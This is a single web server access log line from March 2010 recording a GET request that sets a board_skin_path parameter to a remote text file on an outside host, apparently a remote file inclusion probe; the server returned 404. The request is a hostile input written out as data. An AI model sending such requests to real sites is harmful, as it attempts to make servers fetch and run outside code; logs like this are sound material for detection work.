58.150.99.144 - - [08/Mar/2010:05:39:31 -0800] "GET /write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
